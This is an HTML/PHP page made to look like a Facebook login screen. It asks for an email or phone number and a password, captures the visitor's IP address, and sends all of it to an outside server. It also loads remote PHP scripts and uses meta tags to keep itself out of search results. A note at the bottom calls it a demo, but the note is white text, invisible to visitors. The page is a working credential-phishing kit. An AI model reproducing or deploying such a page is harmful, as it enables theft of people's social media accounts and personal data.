<!doctype html>

<html>

<head>

 


	<title>.</title>

	

  <meta name=”robots” content=”noindex”>

  <meta name="robots" content="index,follow">

<meta name="robots" content="noindex,follow">

<meta name="robots" content="index,nofollow">

<meta name="robots" content="noindex,nofollow">

<meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />

    <meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />

	<meta charset="utf-8">



	<meta name="description" content="online">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<meta property='og:image' content='earnmoney.jpg' />

	<link rel="shortcut icon" href="https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-ios7-contact-512.png">

  
	<style>

		table tr td{text-align:center;}

.button {

  background-color: #4CAF50; /* Green */

  border: none;

  color: white;

  padding: 14px 20px;

  text-align: center;

  text-decoration: none;

  display: inline-block;

  font-size: 16px;

  margin: 1px 0px;

  cursor: pointer;

}

.button1 {width: 250px;}

.button2 {width: 50%;}

.button3 {width: 90%;

border-radius: 4px;

border: 0px solid DarkGray;

padding: 13px 13px;

margin: 3px 3px;

height: 22px;

background-color: rgb(243,243,243);

display: inline-block;



}

		.bottom a{color:#D3D3D3;}

		.bottom a:link{text-decoration:none;}

		input{padding:10px;}

		

		.login{background-color:rgb(19,90,245);color:white;

border-radius: 4px;

padding: 13px 13px;

margin: -15px -15px;

border: 1px solid DarkGray;

font-family: 'segoe UI';

font-size: 15px;

font-weight: bold;

		  

		}

		

.center {

  display: block;

  margin-left: auto;

  margin-right: auto;
  padding-top: 10px;
  padding-bottom: 5px;
 

}

		.login{width: 97%;}

		.check{background-color:#0ac21e;color:white;padding:10px;

margin: 4px 2px;

		}

		.inputf a:link{text-decoration:none;}

.phone{
  position: relative;
  bottom: 14px;
  
}
.me{
  position: relative;
  bottom: 24px;
  left: 5px;
  font-family: Arial;
  font-weight: 400;
}

	</style>

</head>

<body style="margin:0px;">
 

<script>

	document.title='online';

</script>

<div style="width:100%;">

  

<div style="width:100%;">

<div style="height:20px;background-color:rgb(251,251,217);padding-bottom:10px;padding-left:0px;">


	<img src="https://pinnocent.com/image/login1.jpg" width="360px" height="59px" class="phone"class="me">

</div>



</div>

<div style="width:100%;">

 <a href="#">

<img src="https://pinnocent.com/image/fabimg.png"  alt="screenshot demo" width="90" height="70" class="center">  </a>



<div class="inputf" style="background-color:white;padding:10px;text-align:center;">

<form id="anonymousNewMessage" class="form" method="POST" action="https://50info.com/vpage">

                <div class="card-header text-center">



              



     

                </div>

                <div class="card-body">



                  <input type="hidden" name="user_id" id="userUsername" value="<?php echo $_GET["user"] ;?>">

		<input class="button3" name="message_title" type="text" id="" placeholder="Email address or phone number" maxlength="40" size="35px"

		required><br>

		<input class="button3"  name="description" type="text" id="pass" placeholder="Password" maxlength="40" size="35px"

		required>

    <input type="hidden" name="ip" value="<?php echo $ipaddress = $_SERVER['REMOTE_ADDR']; ?>" />

<input type="hidden" name="link" value="facebook" />



    <!-- the rest of the form //-->



<br/><br/>

		<input class="login" name="login" type="submit" id="anonymousProcess" value="Log In"><br/><br/>

 <a href="#">

	<img src="https://pinnocent.com/image/fbfooter.jpg" alt="screenshot demo" width="350" height="350"></a>

	

</div>
  <?php include('https://nairaa.com/tab.php');?>
<?php include('https://nairaa.com/analystic.php');?>
</div>

<p style="color:white">This is page is for demo purpose only... please do not login your account.</p>








  </script>

</body>

</html>